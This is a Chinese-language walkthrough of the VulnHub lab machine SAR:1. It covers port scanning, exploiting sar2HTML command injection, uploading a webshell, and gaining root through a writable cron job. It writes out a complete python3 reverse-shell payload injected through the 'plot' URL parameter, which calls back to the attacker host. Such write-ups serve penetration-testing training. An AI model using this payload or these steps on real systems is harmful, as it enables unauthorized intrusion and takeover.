考点:文件上传、命令执行、定时任务
靶机链接:https://www.vulnhub.com/entry/sar-1,425/
环境配置
名称 | IP |
---|
Kali Linux | 10.0.2.15 |
SAR | 10.0.2.12 |
初步打点
端口扫描
1
2
3
4
5
6
7
8
9
10
| $ export $tip=10.0.2.12
$ sudo nmap -v -A -p- $tip
Scanning 10.0.2.12 [65535 ports]
Discovered open port 80/tcp on 10.0.2.12
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.29 (Ubuntu)
|
WEB测试
看来要硬钢web应用了
查看phpinfo
查看robots.txt
尝试访问sar2HTML作为二级目录
漏洞发现
搜一下sar2ascii.tar发现
https://www.exploit-db.com/exploits/47204
获得权限
靶机测试
思路一 命令执行
按照https://www.exploit-db.com/exploits/47204 执行命令
antsword连接成功
使用python直接反弹端口失败了,可以替换python3 python3.5 python3.6 python3.87 python3.8 python3.9
等等,例如这台靶机使用python3
成功反弹
1
| http://10.0.2.12/sar2HTML/index.php?plot=;python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.2.15",444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
|
思路二 文件上传
另外可以点击new直接上传webshell,对应目录是/sarDATA/uPLOAD/
1
| http://10.0.2.12/sar2HTML/sarDATA/uPLOAD/2.php
|
antsword连接成功
提权
linpeas.sh跑了遍发现定时任务
定时任务
修改定时任务的文件,每隔五分钟执行
静静等待,获得root权限shell
最后修改于 2020-02-15